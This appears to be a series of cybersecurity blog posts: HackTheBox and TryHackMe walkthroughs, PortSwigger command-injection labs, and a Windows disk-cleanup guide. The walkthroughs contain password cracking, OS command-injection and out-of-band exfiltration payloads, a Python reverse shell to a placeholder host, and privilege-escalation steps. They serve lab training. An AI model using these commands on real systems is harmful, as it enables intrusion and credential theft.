By incorporating Docker into penetration testing procedures, testers may easily simulate a variety of environments, improving the efficiency and effectiveness of their evaluations. Utilizing Docker for penetration testing is still an effective method for strengthening digital assets and establishing a strong defense against contemporary cyber threats as long as security concerns exist.

You can check out our other blogs here.

Happy Pentesting!!

Team CyberiumX

HackTheBox- Timelapse

Hello folks,

This blog focuses on a machine called “Timelapse” within HackTheBox. It has been classified as an easy machine. It is based on the Windows Operating System. You will be learning about Windows Enumeration and Privilege Escalation. Let’s proceed without any delay and begin the penetration testing process.

You can find the machine in the retired category of HackTheBox over here.

First of all let’s start the machine by clicking on “Join Machine” and scan the obtained IP using “NMAP”.

sudo nmap -sS <Machine_IP>

We can see that there are many ports open such as DNS (53), Kerberos (88), LDAP (389), SMB (445), etc. which confirms that this machine is a Domain controller in an Active Directory environment. Let us move further and start the enumeration process with SMB.

Firstly, we will see the available shares and their permissions with the help of smbmap tool using the following command.

smbmap -H <Machine_IP> -u “CyberiumX”

Here, I have provided any username like CyberiumX which will be treated as a guest account. We get an available share with Read permission named “Shares”

After that we can use smbclient to connect with the available share.

smbclient \\\\<Machine_IP>\\Shares

Now, we will check what content we have here on the “Shares” share using dir command. We will find some directories here, so let us visit them one by one and look for some critical files. After looking into the Dev directory we found a file named winrm_backup.zip which looks very interesting. Let’s download it using following command and look for some other important files:

get winrm_backup.zip

We got nothing special in the other directory, so let us exit from here and try to unzip the compressed file using the following command:

unzip winrm_backup.zip

We will find that there is a pfx file inside the zip file but we cannot decompress it because it requires a password. So in order to get the password of it we need to generate the password hash out of the zip file using zip2john tool as follows:

zip2john winrm_backup.zip > zip_password.txt

We have the password hash of the zip file. Now we can simply use john the ripper on our zip_password.txt file which contains the hash of the zip file using the following command:

john –wordlist=/usr/share/wordlists/rockyou.txt zip_password.txt

And then we can simply decompress the file with the password we just obtained using the following command:

unzip winrm_backup.zip

It will decompress a file with the name “legacyy_dev_auth.pfx”. Here legacyy or legacyy_dev looks like a username.

Getting Foothold on Timelapse

Now using the pfx file we can generate .pem and .crt files which will help us to take access to the Windows machine using WinRM. In order to generate the pem file, we can simply use the following command: (This will require a password that we do not know. Let us check.)

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out CyberiumX_key.pem

We got an error as invalid password as we do not have access to the password of the pfx file.

Now we need to get the password hash of the pfx file using a tool named pfx2john. This tool is located at /usr/share/john. In order to get the hash, we need to copy the pfx file to /usr/share/john and then we need to run the following command:

sudo ./pfx2john.py legacyy_dev_auth.pfx > /home/CyberiumX/pfx_hash.txt

This will provide us with the hash of the pfx file. Now, we will again use john the ripper tool to get the password of the pfx file using the following command:

john –wordlist=/usr/share/wordlists/rockyou.txt pfx_hash.txt

John the ripper successfully provided us the password of pfx file and now we can finally generate pem file using the same command as follows:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out CyberiumX_key.pem

It asked for a pass phrase which we can set of our choice.

Next, we will generate the crt file using the same tool openssl and pfx file as follows:

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out CyberiumX_cert.crt

We can see that we have both the files here.

Now we have to generate a pem file with RSA asymmetric encryption signature because it will be used to take the remote shell using WinRM. So, we will use the following command to create it:

openssl rsa -in CyberiumX_key.pem -out CyberiumX_rsa.pem

Okay. So, now after everything we have done we will use Evilwinrm tool to get the remote access of the target machine. We will provide Machine’s IP, username as legacy, CyberiumX_rsa.pem as Key file with RSA signature and CyberiumX_cert.crt as our certificate file as follows:

evil-winrm -i <Machine_IP> -u legacyy -k CyberiumX_rsa.pem -c CyberiumX_cert.crt –S

Great!!! We got our foothold on Timelapse. We can go to User’s Desktop and look for User.txt file.

Now after trying different methods to escalate the privileges, we found password for a user named svc_deploy in the history of Powershell using following command:

cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Let’s take the access of svc_deploy user on Timelapse using Evilwinrm tool as follows:

evil-winrm –I <Machine_IP> -u svc_deploy -p ‘<password>’ -S

Privilege Escalation on Timelapse

Now, we need to find our way to get Administrative access on Timelapse.
In the Documents folder of svc_deploy user, we are getting a directory named AdmPwd.PS.

So, I researched this directory on Google and heard about LAPS (Local Administrator Password Solution) which provides a solution to manage local account passwords of domain joined computers. Hence the name of machine is Time-LAPS

You can check out the article by HackTricks about LAPS Penetration Testing.
Now let us check if the following registry is set or not:

reg query “HKLM\Software\Policies\Microsoft Services\AdmPwd” /v AdmPwdEnable

This is set on the target machine. Let us confirm that is there any group related to LAPS using the following command:

net groups /domain

So, we have a group named LAPS_Readers which is a domain group.
Now let us finally confirm whether we are a member of this group using the following command:

net groups “LAPS_Readers” /domain

Great!!! We are a member of this group. Now we need to find a way to get the password of Administrator users using LAPS.
After searching a lot on the internet I finally found one command which requires the name of the DC as an argument. So let’s first get the name of DC using the following command:

Get-AdDomainController

We will find that the name of the DC is dc01. So using this name we can now run our final command which will extract the password for the admin user and show it to us on the screen. The command is as follows:

Get-ADComputer dc01 -Properties ms-Mcs-AdmPwd

Hurray!!! We got the password of the administrator user. Let us again use evilwinrm tool to get access to the administrator user using the looted credentials. The command is as follows:

evil-winrm -i <Machine_IP> -u administrator -p ‘<password>’ –S

Yeah!!! We have administrative access here. Now we need to read the contents of root.txt file which we could not find in the Administrator directory. So I checked the Users folder and there we have another user named TRX. So, I checked the Desktop of the TRX user and there I found the root.txt file which we can read with the help of the type command.

So, this was all about the Timelapse machine by HackTheBox. We learned about some new terms here like How to get the password hash of a pfx file and how to crack it, how to get access using key and crt files, about LAPS, etc.

You can checkout out other blogs on HackTheBox machines here.

Happy Pentesting!!!

Team CyberiumX

Portswigger- Command Injection Vulnerability

Hello folks,

This blog focuses on how we can identify and exploit Command Injection vulnerabilities on websites. This is also known as OS Command Injection vulnerability. In this blog, I will be providing a detailed walkthrough of all PortSwigger’s Lab. I am assuming that you guys have basic knowledge of Linux and Windows Operators.

You can check out the Portswigger’s labs for Command Injection vulnerability here.

Let’s proceed without any delay and begin the penetration testing process.

Lab 1- OS command injection, simple case

In this lab scenario, we will be looking at a simple case of Command Injection without any defense in place. The rule 1 in order to exploit this vulnerability is to look for GET and POST parameters on the website. After that, we will simply try to execute OS commands using different operators used on Windows and Linux Operating systems.

Let’s access the lab. We will require the Burp Suite Community edition here.

There are many products available on the home page of the website. We can click on the “View details” button of any product and find that there is a “Check Stock” feature available on the webpage. Let us click on it.

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/product/stock” endpoint. Take the request to repeater.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter starting from productId parameter:

& whoami &

After typing the above payload, select the payload and press Ctrl + u to URL encode the whole payload.

+%26+whoami+%26+

Let me explain this payload to you guys. We want to run the “whoami” command, so in order to execute it we provided a URL encoded & operator (%26), one in the beginning and another one in the end. The reason for using & operator is to execute the previous process in the background and then execute the next command. Also, the URL encoding of space is +.

Simply send the request from Burp Repeater.

We will get the output of whoami command in the response which confirms that this parameter is vulnerable to command injection vulnerability. This will solve the lab.

Lab 2- Blind OS command injection with time delays

In this scenario, we will be understanding what Blind Command Injection vulnerability is and what are the possible ways through which we can identify and exploit it? Blind means that you will not get the output of any command in the response but you can still exploit it using various methods. So, first of all we will be identifying blind command injection vulnerability by generating time delays.

Let’s access the lab. We will require the Burp Suite Community edition here.

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Over here, we can provide feedback to the website by submitting a feedback form which has four parameters: Name, Email, Subject and Message. Let us fill the form with any random values and click on the “Submit feedback” button. You will get a message on the web page “Thank you for submitting feedback!”

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:

& ping –c 10 127.0.0.1 &

After typing the above payload, select the payload and press Ctrl + u to URL encode whole payload.

+%26+ping+-c+10+127.0.0.1+%26+

Let me explain this payload to you guys. We want to run “ping” command so that we can confirm that the web application is waiting for the command to completely execute and then bring back the response to us. The IP that we have used here is called a Loopback address which is its own interface. In the response, we will not get any output (blind). Hence this will cause a time delay which will help us to confirm blind command injection vulnerability on the parameter. Now, in order to execute it, we provided URL encoded “&” operator (%26), one in the beginning and another one in the end. The reason for using “&” operator is to execute the previous process in the background and then execute the next command. Also, URL encoding of space is +.

Firstly, let us use the above payload on the Name parameter

Simply send the request from Burp Repeater.

You will find that you are getting the response immediately which confirms that the parameter is not vulnerable. Now, try the same payload on Email parameter. Simply send the request from Burp Repeater.

This time you will find that we got the response after 6 seconds which we can confirm from the bottom right corner.

So, we got our vulnerable parameters but this must not have solved the lab because in order to solve it we need 10 seconds time delay.

Let us create another payload where we will increase the number of ping packets to 12 as follows:

+%26+ping+-c+12+127.0.0.1+%26+

Again, let’s send the request from Burp Repeater.

This time we can see that we got the time delay of more than 10 seconds.

There is another command that I would like to discuss here. “Sleep” command allows you to wait for the number of seconds we specified in the command and it will also generate the time delay. Let us try it.

+%26+sleep+10+%26+

Again, let’s send the request from Burp Repeater.

You will again find that we got the delay of exactly around 10 seconds which will help you to solve the lab.

Lab 3- Blind OS command injection with output redirection

In this scenario, we will be learning about how we can exploit blind command injection vulnerability by simply redirecting the output of any command into a file which we can easily access on the target website. Let’s see it in action.

Let’s access the lab. We will require the Burp Suite Community edition here.

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:

+%26+ping+-c+10+127.0.0.1+%26+

It is the same payload that we used in the previous lab to confirm that the parameter is vulnerable to blind command injection vulnerability. Let us directly try the payload on email parameter.

Send the request from Burp Repeater.

We can confirm that the parameter is vulnerable as we got the time delay of around 9 seconds. Great! Let us now change the payload and try to redirect the output of whoami command to any file which we can create in /var/www/images. This location is already provided to us in the lab description. Now the payload will look like the following:

+%26+whoami+>+/var/www/images/a.txt+%26+

Here we are executing the whoami command and then redirecting the output to a file named a.txt using (>) operator which is then stored in the provided location.

Now simply we need to find an image on the webpage and replace the name of the image with our filename and see if it is allowing us to get the command output.

Let’s replace the filename with a.txt and hit enter. We will find that we are getting the output of the whoami command.

This will solve the lab.

Lab 4- Blind OS command injection with out-of-band interaction

In this scenario, we will learn about exploiting blind command injection vulnerability using OAST techniques. We can check if the parameter is vulnerable by using commands like ping or nslookup to send a request to a domain that we control. So, we need to use Burp Collaborator. Let us see how to exploit it.

Let’s access the lab. We will require the Burp Suite Professional edition here.

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

Now in order to use OAST techniques, we need a Burp Collaborator. So, we will open it and copy the Collaborator’s subdomain by clicking on “Copy to Clipboard”.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:

+%26+ping+BURP_COLLABORATOR_SUBDOMAIN+%26+

Here, we are simply trying to ping the collaborator’s subdomain to confirm that if we receive any DNS requests on our Collaborator window then the parameter is vulnerable. Let us directly try the payload on email parameters.

Send the request from Burp Repeater.

Now, we will switch to the Burp Collaborator window and click on “Poll now” to check if we received any DNS requests or not.

We will find that we received some interaction with subdomain which confirms that the email parameter is vulnerable to blind command injection vulnerability.

We can also use nslookup to send DNS requests to the subdomain using the following payload:

+%26+nslookup+BURP_COLLABORATOR_SUBDOMAIN+%26+

Send the request from Burp Repeater.

Now, we will switch to the Burp Collaborator window and click on “Poll now” to check if we received any DNS requests or not.

We will again find that we received some interaction with the subdomain. Hence it will solve the lab also.

Lab 5- Blind OS command injection with out-of-band data exfiltration

In the final scenario, we will learn how we can exfiltrate data using OAST techniques. We will use Burp Collaborator’s subdomain to get (exfiltrate) the output of any command. Let us begin the process.

Let’s access the lab. We will require Burp Suite Professional edition here.

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

Now in order to use OAST techniques, we need a Burp Collaborator. So, we will open it and copy the Collaborator’s subdomain by clicking on “Copy to Clipboard”.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:

+%26+ping+`whoami`.BURP_COLLABORATOR_SUBDOMAIN+%26+

Here, we are simply trying to use a command whoami as a subdomain of collaborator’s domain and using ping command to confirm that if we receive any DNS requests on our Collaborator window then the parameter is vulnerable and it will contain the output of whoami command. Let us directly try the payload on email parameter.

Send the request from Burp Repeater.

Now, we will switch to the Burp Collaborator window and click on “Poll now” to check if we received any DNS requests or not.

We will find that we received some interaction with subdomain which confirms that the email parameter is vulnerable to blind command injection vulnerability. If we click on any DNS request, we will find the output of whoami command as a subdomain of the collaborator’s domain name.

We can submit the output of the whoami command and this will solve the lab.

We have discovered many ways to identify and exploit Command Injection Vulnerabilities.

You can also check out our other PortSwigger blogs here.

Happy Pentesting!!!

Team CyberiumX

Optimizing Windows Performance

For Windows to keep functioning smoothly and effectively, storage space must be cleared. As you use your personal computer, numerous files generate, through important hard disk space. Removing unused and transient files from a storage location can enhance overall speed and make way for more important data. It will help in optimizing windows.

Importance of Windows optimization for Cyber Security

There are various advantages of clearing Windows space for optimization in terms of Cyber Security. Sensitive data is protected by deleting temporary files, cache, and unneeded apps, as well as the attack on the system is decreased. The system’s capacity to identify and stop cyber-attacks is strengthened through quicker software updates and better-performing security technologies. The danger of data loss is lower when space is regularly cleared, and proactive defense tactics are encouraged. While maximizing Windows space is beneficial for online safety, it should be a part of a broader security strategy that also involves using strong passwords, staying up to date with software, and educating users about online dangers. Also, apart from online safety, it is necessary to have storage space on our windows machine to setup virtualization for penetration testing. Penetration testing requires many applications and tools which are heavy in size. In order to setup a penetration testing environment, we need windows storage optimization.

You can perform the following actions to free up space for storage in Windows:

1. Clearing windows cache and windows temp files

A crucial step in freeing up storage space and improving your computer’s speed is deleting temporary files. Various programs and processes generate temporary files as part of routine operation. To speed up particular activities or enhance user experience, they are used to store data that is temporary or cache. But gradually, such temporary files can build up and take the important disk space, thereby slowing down your machine.

Why Delete Temporary Files:

Temporary files are build up over time and occupy a sizable amount of disk space as they are continuously updated and produced. Clearing temporary files can have the following advantages:

Free up storage space: You can make precious hard drive space available by deleting pointless temporary files, giving you more room for crucial documents and programs.
System performance improvements: Your computer’s performance may be slowed down by a cluttered disk. Your system’s overall speed and performance can be enhanced by removing temporary files.
Resolve program problems: Corrupt or out-of-date temporary files may result in program conflicts and problems. These files can be deleted to help with some software-related problems.
Enhanced privacy: By clearing your browser’s temporary files and cache, you can prevent your computer from keeping confidential information like login information and browsing history.

How to Delete Temporary Files:

As previously noted, you may use the Disk Cleanup application to remove temporary files from Windows. There are, however, additional techniques you can employ:

A. Using Disk cleanup software– The Disk Cleanup program has a few simple procedures that must be followed in order to remove temporary files from Windows:

Launch Disk Cleanup: Click the “Start” button or hit the “Windows key” to open the Disk Cleanup program. Then, type “Disk Cleanup” into the search box. Disk Cleanup can be chosen from the search results to launch the tool.

Choosing the target drive: You will be prompted by Disk Cleanup to select the drive you want to clean up. The system drive (C:) is typically chosen. Select the drive, then select “OK”.
Analysis and Cleanup Start: The tool will now examine the drive to find removable files. A list of file categories that are suitable for cleanup will be shown following the analysis.
Select Temporary Files: In the Disk Cleanup box, look for the “Temporary files” category, which includes temporary files generated by operating systems and programs. To include temporary files in the cleanup procedure, tick the box next to “Temporary files”. You can also choose to clean out additional file types, such as “Temporary Internet Files” or “System error memory dump files” if you like.

Commence Cleanup: Once you’ve chosen the file categories, click “OK” or “Delete Files” to start the cleanup process. You’ll see a confirmation popup asking for your approval before continuing.
Wait for the cleanup completion: The Disk Cleanup tool will then start eliminating the chosen temporary files. Depending on the data that needs to be eliminated, the process’s duration will change.
Successful cleanup: A dialogue box displaying the amount of space freed up will appear after completion. Click “OK” to exit the dialog box.

B. Manually Deleting Temporary Files:

Launch the Run dialogue box by pressing the Windows key + R.
Enter the text %temp%. This opens the temporary files folder called Temp which stores the temporary files for the logged in user.

Ctrl + A to select all files, then remove them. It is typical for some files to be in use and unable to be erased. You can leave those files.

Again launch the Run dialogue box by pressing the Windows key + R.
Enter the text temp. This opens the temporary files folder called Temp.

Ctrl + A to select all files, then remove them. It is typical for some files to be in use and unable to be erased. You can leave those files.

Again launch the Run dialogue box by pressing the Windows key + R.
Enter the text prefetch. This opens the temporary files folder called Prefetch.

You might be asked for the Administrator’s permission to access the folder. Please click on “Continue”.
Ctrl + A to select all files, then remove them. It is typical for some files to be in use and unable to be erased. You can leave those files.

2. Clearing GPU cache to improve windows gaming performance and storage:

If you have speed problems, stumbling, or frame rate reductions while playing games on Windows computers, you may benefit from clearing the GPU (Graphics processing unit) cache. Your graphics card’s GPU cache is a storage area used to keep data that is frequently used for quicker retrieval during rendering processes. But after time, the cache may fill up or turn stale, which will slow down games. These problems can be resolved, and overall gaming performance can be enhanced, by clearing the GPU cache. Here’s how to get started:

Restart Your Computer: Restarting your computer can sometimes clear the GPU cache and fix small performance issues. The GPU cache is cleared when you restart, and your graphics card starts from scratch.
Update Graphics Drivers: Ensure that the drivers for your graphics device are current. Manufacturers frequently provide driver updates to improve compatibility with the newest games, correct bugs, and optimize performance. The most recent drivers are available for download on the official web page of the company that makes your GPU (such as NVIDIA, AMD, or Intel).
Modify Graphics Settings: Especially on older or weaker GPUs, reducing the in-game graphics settings can greatly enhance gaming performance. To minimize the GPU workload, lower settings for resolution, texture quality, shadows, and anti-aliasing.
Keep an eye on the GPU temperature: Overheating can affect a game’s performance. Use programs like MSI Afterburner or HWMonitor to keep track of your GPU temperature and make sure it stays within acceptable ranges. Clean the graphics card and make sure your computer case has enough ventilation if the GPU is running too hot.
Look for background processes: Make sure no resource-hungry background processes or programs are running while you game. The GPU’s capacity to produce frames effectively can be impacted by other apps using a lot of CPU or disk space.
Use Gaming Mode (Windows Game Bar): Windows 10 comes with a “Gaming Mode” that enhances system performance while gaming. To access the Game Bar and turn on Gaming Mode, use the Windows key + G.
Delete Shader Cache: Shader data is now stored in a cache on modern graphics cards for quick access while rendering. Performance issues can occasionally be resolved by clearing the shader cache.

For AMD and NVIDIA graphics cards, follow these steps:

For graphics cards made by NVIDIA:

To get to the NVIDIA Control Panel, do right-clicking on the desktop and choose “NVIDIA Control Panel”.
Go to the left-hand window and select “Manage 3D settings”.
Scroll down to “Shader Cache” under the “Global Settings” tab and select “Delete”.

When asked to confirm the deletion, do so.

For graphics cards made by AMD:

A shader cache is used by AMD graphics cards and is kept in the “AMD” folder of the “Local” app data directory. Typically, the location is C:\Users\your_username\AppData \Local\AMD\DxCache.
Any active GPU-using programs or games should be shut down.
Go to the aforementioned AMD folder and remove everything from it. Just the files inside the folder should be deleted, not the folder itself.

Keep in mind that, while cleaning the GPU cache and optimizing settings can assist boost gaming performance, the final result also depends on your hardware’s capabilities. Consider updating your graphics card or other components to meet the requirements of contemporary games if you are still having serious performance problems.

3. Removing old windows updates

Removing outdated Windows updates might help your computer clear up space while also potentially resolving conflicts between updates or faulty update files. Windows updates are crucial for maintaining the security and most recent features and upgrades on your PC. But over time, especially when you have a little amount of storage, these upgrades can add up and take up a lot of disk space. This is how to uninstall previous Windows updates:

Before continuing, it’s important to realize that deleting outdated Windows updates may prevent you from doing so in the future. Although it is normally safe to remove outdated updates, doing so could impede your capacity to go back in time if necessary. Before making any big changes to your system, it’s usually a good idea to create a backup of your vital data because uninstalling updates could not be reversible.

Using the Disk Cleanup software: The Disk Cleanup utility can assist you in deleting unused data, such as outdated Windows updates. Use it as follows:

To see the Run dialog box, press Windows + R.
Input cleanmgr, then hit Enter or click OK.

Click OK after selecting the drive (often C:) on which Windows is installed.

Your ability to free up space will be determined by the utility. Select “Clean up system files” from the “Disk Cleanup” window’s menu.

Once more, choose the drive (often C:) on which Windows is installed, and then click OK.
Wait for the utility to determine the amount of space that can be released. This could take some time.
Scroll down the list of files to delete to the entry under “Previous Windows installations” or “Windows Update Cleanup”. There is a checkbox next to it.

You might also look into other things you want to get rid of, including temporary files or system cache.
To confirm the deletion of previous Windows updates and the additional files you’ve chosen, click OK and then click Delete Files.

Manually deleting windows update files: If disk cleanup doesn’t completely remove all the old windows updates, you can:

To see the Run dialog box, press Windows + R.
Enter C:\Windows\SoftwareDistribution. Press Enter.

This will launch the “Download” folder, which contains files for Windows updates.

Ctrl + A to select all items in the “Download” folder and remove them all. To achieve this, you might require administrator rights.
When asked to confirm the deletion, do so.

Please take note that your machine could no longer have those exact updates after uninstalling outdated Windows updates. New updates, however, will be downloaded and installed as usual as they become available.

Removing outdated Windows updates is not always a sure fix for performance or disk space concerns, so keep that in mind. Consider other elements such as system hardware, program conflicts, or the requirement for system maintenance and optimization if issues persist.

Remember that although deleting outdated Windows updates is often secure, doing so prevents you from ever uninstalling them again. You won’t be able to restore a state using those particular updates after uninstalling outdated updates. However, regular download and installation of new updates will continue.

4. Removing old programs from windows

An important task that helps clear up storage space and maintains your system is removing outdated programs from Windows. On your computer, you might install a variety of programs throughout time, some of which might not be used or needed anymore. In addition to freeing up disk space, uninstalling outdated programs helps enhance system efficiency. Here’s how to uninstall outdated softwares from Windows:

A. Using Control Panel: The Control Panel is the standard technique for uninstalling programs on Windows. Take these actions:

Windows OS versions 10 and 11:

Go to the context menu by right-clicking the Start button and then selecting “Installed apps”.
You can view a list of installed programs by visiting this settings

Find the program you wish to uninstall by scrolling down the list.
Then select the program you want to remove, click the options icon (…) and select “Uninstall”
To finish the removal process, adhere to the on-screen instructions.

Microsoft Windows 7:

Control Panel can be found by right clicking on the Start menu.
Click Programs and Features under Programs in the Control Panel.

A list of the installed programs will be displayed. Double click the program name to uninstall the program.
To finish the removal, adhere to the on-screen directions.

B. Making use of Windows settings (Windows 10 and Windows 11):

Programs can also be removed using the Settings app in Windows 10 and Windows 11. How to do it is as follows:
By pressing the Windows key + I or by clicking the Start button and choosing the Settings icon, you can access the Settings app.
Click on Apps in the left-hand sidebar of the Settings box and then on “Installed apps”.

A list of the installed apps and programs will be displayed. Click the Uninstall button after finding the item you wish to get rid of.
To finish the uninstallation procedure, adhere to the on-screen directions.

C. Utilizing uninstaller software

For eliminating outdated programs, you can also use third-party uninstaller programs that provide more sophisticated functionality. Revo Uninstaller, IObit Uninstaller, and Geek Uninstaller are a few well-known uninstaller programs. These utilities can assist you in completely uninstalling programs, including any residual files and registry entries that the default Windows removal process can leave behind.

D. Removing Windows Store Apps:

For Windows 10 and Windows 11 users, you can also remove Windows Store apps from the Settings app or directly from the Start menu. Right-click the app tile or icon and select Uninstall.

Before uninstalling a program, make sure that you no longer need it and that it does not affect the functionality of other software. Additionally, we recommend backing up important files and settings before making any major changes to your system. Regularly removing obsolete programs keeps your computer running smoothly, keeps it organized, and leaves enough disk space for the programs you actually use.

5. Removing large files in windows

It’s crucial to locate huge files in Windows in order to discover and manage disk space more efficiently. Thankfully, Windows comes with tools and capabilities that make it easy to locate huge files quickly. Here’s how to locate big files on a Windows machine.

Using File Explorer:

By arranging files by size in Windows File Explorer, you may find huge files. This is how it’s done:

Either click the File Explorer icon in the taskbar or press Windows Key + E to launch File Explorer.
Navigate to the location on the drive or folder where the huge files are located.
Click the search icon in File Explorer’s upper right corner and type the following search term: size:gigantic

File Explorer shows all Large files (you can enter specific file size such as “size:largerthan:500MB” to customize the size filter to your liking).
Look at the list of large files and decide if they should be kept or deleted.

6. Setting up windows storage sense

A simple solution to automatically manage storage space on your Windows computer is to set up Windows Storage Sense. By deleting superfluous things including temporary files, out-of-date Windows updates, and files in the Recycle Bin, Storage Sense helps free up disk space. Additionally, it has the ability to remove “Downloads” folder files that haven’t been edited in a certain amount of time. How to configure Windows Storage Sense is as follows:

Open the settings: To launch the Windows Settings app, press Windows key + I. As an alternative, you can select the Start button, then select the Settings
In the Settings window, select System.
Click Storage in the left-hand sidebar of the System
You may obtain a summary of your storage consumption in the Storage settings. In that section, look for Storage Sense.

Toggle the switch next to “Storage Sense” to “On” to activate the feature.
By clicking on “Storage Sense” option after enabling Storage Sense, you can modify its settings.
You can choose how frequently you want Storage Sense to run and clear space in the settings options. You have the following selections:

Off: Storage Sense won’t launch on its own, but you can still launch it manually when necessary.

Every day: Storage Sense will be activated to remove unused files.

Every Week: Storage Sense will operate once every week.

Every Month: Storage Sense will operate once per month.

You can select the types of files that Storage Sense should clean up by making your selections below the options for cleanup frequency. It will be configured by default to delete temporary files and files from the recycle bin.
Additionally, you can select the number of days after which files in the Downloads folder will be erased if they haven’t been edited by toggling on “Delete files in my Downloads folder that haven’t changed for over”.

Once you’ve configured the Storage Sense options to your preference, you can close the Settings window, and Storage Sense will now automatically clean up unnecessary files based on your chosen settings.

Storage Sense is a useful feature that helps you manage your storage space automatically, ensuring your computer runs smoothly and efficiently. By regularly cleaning up unnecessary files, you can avoid running out of disk space and keep your system organized.

In conclusion, improving Windows performance by deleting unused files and clearing the cache has considerable advantages for both system effectiveness and cyber security. By reducing vulnerabilities, protecting sensitive data, and encouraging a pro-active defense approach, doing these maintenance chores on a regular basis helps to create a more secure computing environment. It also improves security tools, minimizes the attack surface, and makes storage space available, all of which increase the system’s resistance to online assaults. Adopting these optimization techniques guarantees a smoother and safer computing experience, shielding users from potential dangers while improving the overall performance and health of the system.

You can check out our other blogs here.

Stay Safe!!

Team CyberiumX

TryHackMe- Weasel

Hello folks,

This blog focuses on a recently added machine called “Weasel” within “TryHackMe” Platform. It has been classified as a Medium-level challenge. This machine will help you to understand Pivoting and Windows Privilege escalation. Let’s proceed without any delay and begin the penetration testing process.

You can access the machine here on TryHackMe.

First of all let’s start the machine by clicking on “Start Machine”. Scan the obtained IP using the tool “NMAP”.

nmap –sV -sC <Machine_IP>

There are a total 6 TCP ports open. The important ones are SSH(22), SMB(445), RDP(3389) and HTTP(8888). Here, SSH looks very interesting as normally on windows machines we do not see this port open. Let us start the enumeration from HTTP and SMB protocols.

On the HTTP port, we can see a Jupyter Notebook login page which requires either a password or a token to login.

I tried gobuster as well but didn’t get any interesting directory. There is nothing else that we can find on the webpage.

Let’s now target SMB service and look for some shares. We can use smbmap to check the permissions on available shares and then smbclient to connect to the shares using following command:

smbmap -H <Machine_IP> -u “CyberiumX”

We can see that we have some shares available out of which the datasci-team looks promising. So let’s connect to it using following command:

smbclient //<Machine_IP>/datasci-team

We can see there are many files and directories available in the share. We need to check all of them to get something interesting.

So after looking into every file and directory, I found something which will allow us to login through the Jupyter notebook. There is a file in misc directory named “jupyter-token.txt”. Let’s download it and read the contents of it.

We can see that we have a token which might allow us to login. Let us go to the web application and login with the token we have. Yes!!! We are logged in and we have the dashboard of a Jupyter notebook.

Initial Foothold on Weasel

Now, we need to find a way to get a foothold from here. Let us see how the Jupyter notebook works.

There is a “New” option which can create a new python3 notebook, so I clicked on it and tried to execute a simple python3 code. So we can confirm that it helps us to execute any malicious reverse shell code written in Python3. Let’s use the following code to get the reverse shell:

import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<Your_IP>”,1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)

And use netcat to start listening.

nc –nlvp 1337

We can see that we have gained our foothold on a Linux machine. But wait…wasn’t it supposed to be a Windows machine? Ahh!!! We have to pivot our way to it.

Pivoting on Weasel

Let’s upgrade the shell and find our way out of it.

I moved to the home directory of dev-datasci user. There, I found a file with the name “dev-datasci-lowpriv_id_ed25519”. I read the contents of it and it looked like a private key for SSH.

We know that we have SSH protocol running on the target windows machine, so it might help us to Pivot on our windows machine. Let’s try it out.

Let’s create a file on our machine with any name and paste the contents of the dev-datasci-lowpriv_id_ed25519 file on our new file. Also we will provide required permission to our private key file.

nano id_rsa

chmod 600 id_rsa

Now, we will use the ssh command to get access to the windows machine. But wait a second, for which user are we going to take the access? So, I tried ssh for dev-datasci and dev-datasci-lowpriv users and finally I got access using the second one.

ssh -i id_rsa dev-datasci-lowpriv@<Machine_IP>

Sweet!!! We have successfully accessed our target windows machine. Let’s get the contents of user.txt and move forward to get System access.

Privilege Escalation on Weasel

Let us upload WinPeas on our target machine to get possible ways for privilege escalation. We will use Python3 HTTP server on our machine to host the file and certutil to download the file on our windows machine using following commands:

python3 –m http.server 1234

certutil -urlcache -f http://<Your_IP>:1234/winPEASany_ofs.exe winPEAS.exe

We will execute the winPEAS.exe file by simply typing

winPEAS.exe

It’s always helpful to put the output of WinPEAS in a file so that we can review it further using the following command:

winPEAS.exe > winpeas.txt

Now let’s read out the output of winPEAS and try to look for possible ways to escalate the privilege.

In order to read the contents of the whole WinPEAS file in our terminal window, I used the Terminator tool as it has an option for infinite scroll-back which will help you a lot.

So after searching for juicy info in the output, I finally found two important and critical pieces of information which might help us to escalate privileges.

First one is a vulnerable functionality named “AlwaysInstallElevated” which allows any low privilege user to execute MSI (MicroSoft Installer) files with SYSTEM privileges.

Secondly, we got the password for our current logged in user “dev-datasci-lowpriv”

Also, we can simply confirm about AlwaysInstallElevated functionality by querying the windows registry as follows:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

We can see that this registry path exists on the system which confirms that this functionality exists.

Now in order to exploit it, we need to create a malicious MSI file which is very simple with msfvenom. Let us use the following command to create it:

